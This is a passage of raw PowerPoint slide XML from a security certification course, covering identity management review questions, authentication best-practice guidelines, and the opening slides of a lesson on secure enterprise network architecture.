            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="5020732"/>
            <a:ext cx="8534400" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Review Activity: Identity Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC7FCF52-5F5E-CB0A-73E2-FD98958797BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="685800"/>
            <a:ext cx="9958388" cy="4610100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the purpose of implementing LDAP?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>True or false? The following string is an example of a distinguished name: CN=ad, DC=515support,DC=com.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>True or false? In order to create a service ticket, Kerberos passes the user’s password to the target application server for authentication.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You are consulting with a company about a new approach to authenticating users. You suggest there could be cost savings and better support for multifactor authentication (MFA) if your employees create accounts with a cloud provider. That allows the company’s staff to focus on authorizations and privilege management. What type of service is the cloud vendor performing?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You are working on a cloud application that allows users to log on with social media accounts over the web and from a mobile application. Which protocols would you consider, and which would you choose as most suitable?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16436550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97DA8-11D3-B606-FEC4-693E69AED8B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="5350933"/>
            <a:ext cx="8534400" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson 4 Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4130C994-A86A-5B56-7484-608106D3F1AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="177800"/>
            <a:ext cx="9945688" cy="5321300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Follow these guidelines when you implement authentication controls:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assess the design requirements for confidentiality, integrity, and availability given the context for the authentication solution (private network, public web, VPN gateway, or physical site premises, for instance).</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determine whether multifactor authentication (MFA) or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passwordless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> authentication is required, and which hardware token or biometric technologies would meet the requirement:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ownership factors include smart cards, OTP keys/fobs and security keys, and OTP authenticator apps installed on a trusted device.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Biometric technologies include fingerprint and face with efficacy determined by metrics such as FAR, FRR, CER, speed, and accessibility.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two-step verification can provide an additional token to a trusted device or account via SMS, phone call, email, or push notification.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password managers can provide better security for password authentication.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Establish requirements for access control between discretionary, mandatory, role-based, and attribute-based models and whether the scope must include federated services (on-premises and cloud, for instance).</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure accounts/roles and resources with the appropriate permissions settings using the principle of least privilege.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure account policies to protect integrity:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credential policies to ensure the protection of standard and privileged accounts, including secure password selection.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Account policies to apply conditional access based on location and time.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Establish provisioning procedures to issue digital identities and account credentials securely.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Establish deprovisioning procedures to remove access privileges when employees or contractors leave the company.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement SAML or OAuth to facilitate single sign-on between on-premises networks and cloud services/applications.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="906587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F57A8-5F50-1B4F-1252-89F67F9E03DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Security Control Functional Types</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{936E2D19-93D0-CB41-835B-DB1E1A89E170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="511680" y="1651000"/>
            <a:ext cx="9064119" cy="4974952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33976362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C6353-E255-6AE6-D2C5-B1FC02B8B149}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="5020732"/>
            <a:ext cx="9386888" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Lesson 5 - Secure Enterprise Network Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{531D06B9-FDC4-8984-D498-13EBE987F759}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this lesson, you will do the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compare and contrast security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>implicatons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of different on-premises network</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>architecture models.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apply security principles to secure on-premises network architecture.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select effective controls to secure on-premises network architecture.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure secure communications for remote access and tunneling.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10930225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03524-2696-85A4-693F-1929D3F7EE8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="5096932"/>
            <a:ext cx="9310688" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Topic 5A - Enterprise Network Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{184C4C1E-EC35-2C4B-FB0B-987ED857B433}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="254000"/>
            <a:ext cx="10174288" cy="4991099"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>While you may not be responsible for network design in your current role, it is important that you understand the vulnerabilities that can arise from weaknesses in network architecture, and some of the general principles for ensuring a well- designed network. This will help you to contribute to projects to improve resiliency and to make recommendations for improvements.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Architecture and Infrastructure Concepts</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network architecture means the selection and placement of media, devices, protocols/services, and data assets:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network infrastructure is the media, appliances, and addressing/forwarding protocols that support basic connectivity.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network applications are the services that run on the infrastructure to support business activities, such as processing invoices or sending email.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data assets are the information that is created, stored, and transferred as a result of business activity.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analyzing the systems involved in provisioning email can illustrate the sorts of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>architecture decisions that need to be made:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Email mailbox server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Mail transfer server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27460024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6AE94-D84A-E72B-E32E-D1CC6EB64FB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Network Infrastructure</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 326">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1061FF38-DD7E-9F14-53C2-CC512DF8AE1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1054100" y="254000"/>
            <a:ext cx="8801100" cy="4559300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29957928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B9540-5668-C7DA-62D9-76B89A356B22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="646112" y="5067300"/>
            <a:ext cx="8534400" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Switching Infrastructure Considerations</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 328">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A0212EC-7FF3-A023-A5F5-C25356E7EB35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381001" y="930438"/>
            <a:ext cx="5240338" cy="4289262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 330">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7170DB6C-C9C3-BB3D-EBB2-35DADE8D9324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5808662" y="719721"/>
            <a:ext cx="6205537" cy="4588879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41781040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DB546-1472-7CC4-FF6C-72BAF1FFEA69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="5020732"/>
            <a:ext cx="9894888" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Routing Infrastructure Considerations</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 333">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACCA8011-5EE4-57AA-619A-B968336225B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="330201"/>
            <a:ext cx="9486900" cy="4987717"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42522586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7CBBB-81C4-C0B2-AD57-1CFA652BAFA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="5173132"/>
            <a:ext cx="8534400" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Virtual LANs</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 335">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A3CE1F-839F-CF7C-87F8-A96A8234DC64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="419100"/>
            <a:ext cx="9245600" cy="5156200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1159919348"/>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208F1-72DD-3050-6FC0-8A6958E77AA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="5109632"/>
            <a:ext cx="8534400" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Security Zones</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 338">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A373109-7608-3E8E-61D4-5D5ABC9D2261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
